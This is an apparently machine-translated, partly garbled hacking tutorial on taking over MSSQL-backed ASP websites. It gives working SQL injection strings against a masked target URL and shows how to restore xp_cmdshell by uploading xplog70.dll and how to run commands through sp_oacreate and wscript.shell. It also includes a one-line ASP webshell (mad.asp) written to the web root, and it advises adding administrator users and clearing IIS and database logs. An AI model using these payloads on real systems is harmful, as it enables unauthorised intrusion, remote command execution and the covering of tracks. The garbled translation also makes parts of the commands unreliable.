Sometimes I always encounter problems in the invasion. For example, when SA encounters XP_cmdshell, what if the administrator deletes XP_cmdshell? Always look at the broiler! Today, I will explain the XP_cmdshell, I hope everyone can understand, can understand well, in MSSQL, with XP_cmdshell storage extensions, support with sysadmin privileges, used to execute system arbitrary commands, but the first network management is not vegetarian, Take it back to remove it, so in the SQL Injection attack, the execution permission to get XP_cmdshell is the ultimate goal. There are 8 mains in MSSQL. Sysadmin Dbcreator Diskadmin ProcessAdmin ServerAdmin Setupadmin SecurityAdmin BulkAdmin These 8 are different. The permissions, everyone can know that Sysadmin permissions are the highest, and we want. . .
Everyone knows that in MSSQL, SA's permissions are supreme, but sometimes I get a sag but can't execute the command, is it very depressed? I have obtained a SA, we all connect it with SqlTools.exe! A more good tool, I also like it, huh, huh! Let us first let's take a look! Use sqltools.exe to see its xp_cmdshell storage extension is deleted, open "Executive Database Command" in the "Using Directory" menu to fill in the command we want to execute: SELECT Count (*) from master.dbo .sOSObjects where xtype = 'x' and name = 'xp_cmdshell' If the return result is 1, it means that it does not delete this extended stored procedure, we can execute the dos command, if not? Then, there is a way, we write directly in the database command execution window: exec master.dbo.addextendedProc 'xp_cmdshell', 'xplog70.dll'; select count (*) from master.dbo.sysobjects where xtype = 'x' And name = 'XP_cmdshell' The meaning of the above is to restore the default stored procedure. If you return 1, the recovery is successful, or the storage extension is deleted, you need to upload an XPLog70.dll to upload files with SqlTools.exe The function can be easily implemented, and the XPLog70.dll file is transmitted to the other party's C: / WinNT / System32, (if not, you need to pass it to the other party's MSSQL directory) in executing the database command: exec master.dbo.addextendedProc 'xp_cmdshell' , 'c: /winnt/system32/XPLOG70.DLL' is good, then the next is the usual command net user and net localgroup administrators command, and clear IIS diary and MSSQL diary is OK! The above method is possible, but we can also use XP_cmdshell to execute system commands. Everyone knows that you can create an ActiveX automatic script through two storage extensions in MSSQL, huh, everyone thinks it! We can give him a plus, the code is as follows: declare @o inteexec sp_oacreate 'wscript.shell', @o outexec sp_oamethod @o, 'Run', NULL, 'NET START Telnet 'The code means that the TELNET to enable the NET Start Telnet to enable the NET START TELNET on the server, which is to manage or create files through the FSO or create a file and write data, huh, you can write directly A WebShell goes to the server! ! ! Hoho ~~~~ Declare @o int, @f int, @ret intexec sp_oacreate 'scripting.FilesystemObject', @o outexec sp_oamethod @o, '
Creatextifile ', @f out,' c: /inetpub/wwwroot/mad.asp ', 1exec @ Ret = sp_oamethod @f,' writeline ', null,' <% set o = server.createObject ("wscript.shell": O.Run ("cmd.exe / c" & required.QueryString ("cmd")%> The above code is created on the server c: /inetpub/wwroot/mad.asp We have directly connected If you don't try it out. I still explain first for everyone to invade you, I hope everyone can understand, and a case now we have to invade the website is this WWW. ***. COM first or Stepping on, find the entrance, now injecting this popular, or inject it, because the general website is the ASP MSSQL structure to set up if this .www. ***. COM / Script.asp? Id = 48 or the same,; 1 = 1 and 1 = 2 Judgment Script.asp? id = 48 and 1 = (SELECT @@ version) I want most of the SP4 patches now. Let's take a look at the permissions of his database connection account, submit: www. ** * .com / script.asp? id = 48 and 1 = (SELECT IS_SRVROLEMEMBER ('sysadmin')) If returns to normal, this proves that the current connection account is server role sysadmin privilege, it seems that the connection account is connected to the SA account connection Oh, I have a good time, still try it. In case it is wrong? Submitted: www. ***. COM / Script.asp? Id = 48 and 'sa' = (select system_user) is used to view If the connection account is connected to the SA, if IE returns to normal. This proves that the connection account is really SA, it seems that the permissions are high (if you want to get the logged in user, use the transact-sql statement: SELECT SYSTEM_USER Let's take advantage of the MSSQL stored procedure, get WebShell, first look at whether XP_cmdshell is deleted by the administrator: www. ***. Com / script.asp? Id = 48 and 1 = (s Elect Count (*) from master.dbo.sysObjects where xtype = 'x' and name = 'xp_cmdshell') If it is deleted, No qu has we recover him.
Submitted: www. ***. Com / script.asp? Id = 48; exec master.dbo.sp_addextendedproc 'xp_cmdshell', 'XPLog70.dll' Try to see XP_cmdshell is back to the submission: www. *** .com / script.asp? id = 48 and 1 = (select count (*) from master.dbo.sysObjects where xtype = 'x' and name = 'xp_cmdshell') If there is no return. This proves that the administrator is renamed this dynamic link library of XPLog70.dll. Do you want to delete it. Now everyone can try the above way, and if you have patient, you can continue. You can try it with CZY. However, two MSSQL stored procedures XP_REGREAD extended stored procedures and xp_regread web assistants stored procedures: XP_regread is used to read registry information, we have received this stored procedure to save in the registry web absolute path sp_makewebtask in us It is used to get WebShell, its main function is to export records for the table in the database, and the file name you can specify. Of course, we have written a very detailed article that is specified as an ASP script file CZY. So, I just simply mention it! Create a table, build a field, and add the contents of the Trojan to this field. Then, the content is exported to the XP_makewebtask stored procedure to save it to the web absolute path to delete the built-in temporary table, you don't know, you can find it online! But still look at these two stored procedures are deleted. . Submitted: www. ***. Com / script.asp? Id = 48 and 1 = (select count (*) from master.dbo.sysobjects where name = 'xp_regread') WWW. ***. Com / script.asp ? id = 48 and 1 = (select count (*) from master.dbo.sysObjects where name = 'sp_makewebtask') If both return to normal, it means that the two stored procedures have not been deleted: (everyone knows MS Many are placed in the registry, the web location we can get in the registry, the location is as follows: hkey_local_machine / system / controlset001 / service / w3svc / parameters / Virtual roots Utilize the extension stored procedure XP_REGREAD We can get its value. EXEC MASTER .dbo.xp_regread ',' System / Controlset001 / Services / W3SVC / Parameters / Virtual Roots', '/' This is taken, but the problem is coming, it is taken out, how do we in IE? Return to its value? First: first create a temporary table, add a field, type: char 255. Oh, use it to save the value of the web absolute path. After you build, we use the registry Method, save the returned value in a variable. Then add the record (ie, the value of the variable) to the new table. This is written to the table.
Submit: DECLARE @result varchar (255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE', 'SYSTEM / ControlSet001 / Services / W3SVC / Parameters / Virtual Roots', '/', @result output into a temporary table (field name provisional) insert VALUES (@Result); - then let us submit: 1 = (Select Count (*) from temporary table where temporary field name> 1)) Continue to submit: www. ***. COM / SCRIPT .asp? id = 48; Create Table [DBO]. [Abcd] ([DACB] [Char] (255)); then we successfully built a table called ABCD, and added types of char, length Field name DACB for 255. Then add data to the table: www. ***. Com / script.asp? Id = 48; create @Result varchar (255) exec master.dbo.xp_regread 'hkey_local_machine', 'System / Controlset001 / Services / W3SVC / Parameters / Virtual roots', '/', @Result Output INSERT INTO CYFD (DACB) VALUES (@Result); - Continue submission to read the web absolute path from the registry, then insert the path into the table just built. Then reported the absolute path of WebShell WWW. ***. COM / Script.asp? Id = 48 and 1 = (Select Count (*) from cyfd where gyfd> 1) IE returns an error, we get a web absolute path such as: E : / INETPUB / WWROOT also deletes the form of the table just built: www. ***. Com / script.asp? Id = 48; Drop Table Cyfd; - Next, do more, the path knows. Getting WebShell because it is no problem, get the Webshell, upload XPLog70.dll through WebShell to the E: / INETPUB / WWWROOT directory. We will return to him. Submitted: www. ***. Com / script.asp? Id = 48; exec master.dbo.sp_addextendedProc 'xp_cmdshell', 'e: /inepub/wwroot/xplog70.dll' (restore, support absolute path recovery!) Use IE to see if it has been restored. Submitted: www. ***. COM / Script.asp? Id = 48 and 1 = (select count (*) from master.dbo.sysObjects where xtype = 'x' and name = 'xp_cmdshell') If IE returns to normal. The description has been restored! Let's build a user below. . . .
